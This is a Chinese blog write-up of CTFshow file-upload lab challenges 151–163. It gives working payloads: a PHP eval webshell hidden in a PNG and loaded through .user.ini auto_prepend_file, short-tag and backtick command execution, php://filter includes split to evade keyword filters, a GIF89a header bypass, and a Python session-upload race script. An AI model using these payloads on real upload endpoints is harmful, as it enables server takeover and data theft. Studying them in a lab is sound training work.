CTFSHOW web入门 文件上传

最新推荐文章于 2024-01-07 17:20:43 发布
最新推荐文章于 2024-01-07 17:20:43 发布
阅读量456 收藏
点赞数
分类专栏: CTFSHOW_WeB 文章标签: 前端 php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44190459/article/details/120968035
版权

文件上传

web151

  • index.png
  • 上传图片🐎,burp抓包,修改名字为1.php,然后访问upload/1.php,然后system(“cat …/flag.php”);
  • 也可以连蚁剑

web152

  • 同151

web153

  • 对php后缀进行了限制,这里先上传.user.ini,然后再传🐎

  • Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

auto_prepend_file = 1.png

  • Content-Disposition: form-data; name="file"; filename="1.png"
Content-Type: image/png

<?php
phpinfo();
eval($_POST[pass]); ?>

  • 之后访问url/upload/,显示了phpinfo,之后按照之前方法拿flag、或者蚁剑

  • php.ini是php的一个全局配置文件,对整个web服务起作用;而.user.ini和.htaccess一样是目录的配置文件,.user.ini就是用户自定义的一个php.ini,我们可以利用这个文件来构造后门和隐藏后门。

  • php中有以下两个配置项,效果相当于require(filename)之类的包含
auto_prepend_file=filename      //包含在文件头
auto_append_file=filename       //包含在文件尾

web154

  • 相比于153增加了对文件内容的检验,这里对php进行了过滤,但是可以用短标签,或者用大写绕过

web155

  • 过滤了php,用短标签,而且发现可以直接拿flag不用再写一遍命令
  • <?=system("tac ../f*");?>相当于<php? echo system("tac ../f*"); ?>

web156

  • 同155

web157

  • 过滤了;
  • 把分号去掉其他同上<?=system("tac ../f*")?>

web158

  • 同上

web159

  • 过滤了(),把system换成``反引号相当于exec,这个没有回显,但是段标签相当于echo,所以还有回显

  • <?=tac …/f*?>

  • 其他同上

web160

  • 把反引号也过滤了,可以利用include进行包含
  • <?=include"ph"."p://filter/convert.base64-encode/resource=../flag.p"."hp"?>
  • 同样上传.user.ini,然后访问/upload/

web161

  • 多了文件头检测,在前面加上GIF89a

  • Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

GIF89a
auto_prepend_file=1.png

  • Content-Disposition: form-data; name="file"; filename="1.png"
Content-Type: image/png

GIF89a
<?=include"ph"."p://filter/convert.base64-encode/resource=../flag.p"."hp"?>

web162

  • 把.ban了

  • session竞争

  • 先上传.user.ini

  • payload

  • import io
import requests
import threading
url = 'http://aa7ff205-5835-4bc1-89fd-d4e12a78bce8.challenge.ctf.show:8080/'

def write(session):
    data = {
        'PHP_SESSION_UPLOAD_PROGRESS':'<?php system("tac ../f*");?>'
        }
    while True:
        f = io.BytesIO(b'GIF89a\ncr')
        files = {'file':('1.png',f,'image/png')}
        response = session.post(url+"upload.php",cookies={'PHPSESSID':'cr'},data=data,files=files)
def read(session):
    while True:
        response=session.get(url+'upload/')
        if 'ctfshow' in response.text:
            print(response.text)
            break



if __name__ =='__main__':
    session = requests.session()
    for i in range(20):
        threading.Thread(target=write, args=(session,)).start()
    for i in range(20):
        threading.Thread(target=read, args=(session,)).start()

web163

  • 同上
JJT_with_hair
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
CTFshow web入门——文件上传
热门推荐
小元砸的博客
03-14 1万+
Web 151
[ctf web]上传user.ini绕过 文件上传漏洞 ctfshhow-web153 wp
ShenZ的博客
07-27 984
这个太糟糕了,我typora截图好多,不知道有没有放乱掉 如果你目录下有user.ini会先去识别里面的配置,但是只有 PHP_INI_PERDIR 和 PHP_INI_USER 模式可以 找到这两个auto_append_file和auto_prepend_file,作用: 一个相当于在每个php文件尾加上 include(“xxxx”) 一个相当于文件头加上 include(“xxx”) 其中xxx就是 auto_append_file的值。 因为.user.ini只对他同一目录下的文件起作用,也就是
文件上传+CTF题目
unexpectedthing的博客
10-27 2365
文章目录概念:文件上传绕过:1.绕过js代码:2.绕过服务端(MIME类型)3.绕过黑名单绕过白名单图片马文件上传后利用蚁剑进行连接后门 概念: web客户端在上传文件时,没有对上传文件的内容,扩展名等进行过滤。 文件上传绕过: 1.绕过js代码: (1)一般的web网页前端在上传文件时,都会利用js代码对文件的扩展名。也就是说,如果对文件的扩展名进行过滤了,可能是js代码的作用了。 (2)方法:利用火狐的about:config来禁用js代码执行。 先使用可以使用的扩展名进行上传,利用bp抓包,改数据包扩
ctfshow-web153(文件上传)
m0_62094846的博客
01-17 1840
.user.ini 原理: 指定一个文件(如a.jpg),那么该文件就会被包含在要执行的php文件中(如index.php),类似于在index.php中插入一句:require(./a.jpg);这两个设置的区别只是在于auto_prepend_file是在文件前插入;auto_append_file在文件最后插入(当文件调用的有exit()时该设置无效)所以要求当前目录必须要有php文件,巧合的是这题upload目录下有个index.php所以这种方式是可以成功的。 注:auto_append_
ctfshow web入门(文件上传)
qq_53263789的博客
07-19 2226
ctfshow 文件上传
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
CTFSHOW web164 PNG二次渲染脚本(生成图片马)
05-04
这段PHP代码创建了一个32x32的真彩色图片,并将一个数组中的RGB值作为像素颜色填充到图片上,最后将图片保存为名为"2.png"的文件。另外,这段代码还暗藏了一个木马内容,可以通过GET请求调用POST请求中的参数作为...
CTFshow 文件上传 web153
Kradress的博客
02-15 1735
目录思路总结 思路 先上传带shell的png文件,上传成功 把文件后缀改成php,上传失败,改成xxxxx上传成功,得知是黑名单过滤, 上传phtml后缀,可以成功上传,但是无法解析,可以试试上传配置文件,访问upload,发现有可执行文件index.php,可以用上传.user.ini来进行文件包含(题目是nginx) user.ini.它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。 条件: 服务器脚本语言为PHP
CTFshow-文件上传
qq_61376069的博客
01-22 502
CTFshow入门——文件上传
ctfshow WEB入门 文件上传151-170
最新发布
byname1的博客
01-07 1314
只是过滤了分号,其他同上。php的最后一个分号可以省略。
ctfshow文件上传
遇事不决冲冲冲
10-20 3191
web151-前端绕过 提示前台校验不可靠,上传png图片,burp抓包修改为php 任意命令执行 这里关闭js的话点击上传图片就没有反应了。 web152-后端绕过 一模一样的步骤,应该上一题前端判断的做法是修改前端代码吧 web153-.user.ini绕过 这里要上传user.ini进行文件上传绕过 简单理解就是.user.ini文件中有一个auto_prepend_file = <filename> //包含在文件头配置项,它的作用的是在同目录.php文件中包含<filen
CTFSHOW文件上传(可能也是持续更新)
Npceer-一位网安初学者的博客
02-14 259
文件上传0x01 web 151 0x01 web 151 按照hint去试了下 写一句话 然后改png 上传 抓包把后缀改成php 然后就上传成功了 然后 我太菜了 不会玩 还想用菜刀呢 然后报错了 没仔细看原因 接着访问url/upload/**.php(你自己写进去的文件名字) 我用的hackbar 从羽大佬博客学了一下 因为我自己用system+cat不知道为啥半天弄不出 ...
CTFshow——文件上传
D.MIND 的博客
02-23 1288
目录:web151、152——前后端的简单检验web153——.user.ini配置文件web154、155——PHP的其他标记写法web156——{ }代替[ ]web157、158、159——web160—— web151、152——前后端的简单检验 发现只能上传PNG文件,上传一个图片马,用Burp抓包修改文件后缀  1.在upload/xx.php页面结合一句话木马  2.用蚁剑、菜刀连接 web153——.user.ini配置文件 细看:.htaccess和.user.ini配置文件妙用 如
【ctfshow】文件上传web151-170wp
weixin_51614272的博客
02-26 1618
文件上传web151-170web1511.编写一句话木马上传2.修改前端验证3.在蚁剑上找flagweb1521.修改前端验证2.burp抓包后修改MIME3.在蚁剑上找flagweb1531.修改前端验证2.上传ini配置文件3.上传1.txt文件4.在蚁剑上找flagweb154 web155 web156 web157 web1581.修改前端验证2.上传ini配置文件3.上传1.txt文件4.在蚁剑上找flagweb159日志包含漏洞web160 web151 1.编写一句话木马上传 发现前端
ctfshow web入门 文件上传(持续更新)
Lum1n0us's Blog
03-26 471
文章目录web151-152web153web154-159web160web161 web151-152 hint是前台验证,那么直接先上传.png后缀的图片马,在burp中将.png改为.php即可,然后蚁剑连接拿到flag web153 这题我试了把后缀改为.Php .php2 .phtml 估计是服务器不解析的原因,在访问时只能把他们下载下来,因为这里是nginx,所以试了上传.user.ini,发现可行 我们指定一个文件(如a.jpg),那么该文件就会被包含在要执行的php文件中(如index.
ctfshow web入门文件上传
Npceer-一位网安初学者的博客
05-25 389
之前已经写了一部分了 补一下博客 给自己之后当笔记看看 这里写目录标题0x01 web153(前面两题懒得写博客了)0x02 web 154 0x01 web153(前面两题懒得写博客了) 首先题目环境大多是nginx 前面两题是前端验证 直接抓包改后缀就行 这次不行了 所以说到nginx我们考虑到.uer.ini (.htaccess是apache下的) 但是被挡下来了 于是上传.user.ini.png 内容是 然后抓包把后缀.png去掉 就可以 这个第一行是gif的文件头 之前写其他平台文件上传的时
ctfshow web入门文件上传
09-29
文件上传是CTF比赛中的一个常见挑战之一。其中一种方法是通过上传包含恶意代码的文件来绕过服务器的文件类型限制。比如,在上传图片时,可以同时上传一个名为.user.ini的文件,并在其中设置auto_append_file参数来包含木马文件。这样,每个PHP文件都会包含我们上传的恶意代码。 另一种方法是通过修改上传文件的Content-Type来绕过服务器对文件类型的过滤。比如,可以先上传一个zip文件,然后通过抓包工具修改请求的Content-Type为image/png,并将文件内容过滤的敏感字符替换掉,这样就能成功上传php等格式的文件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值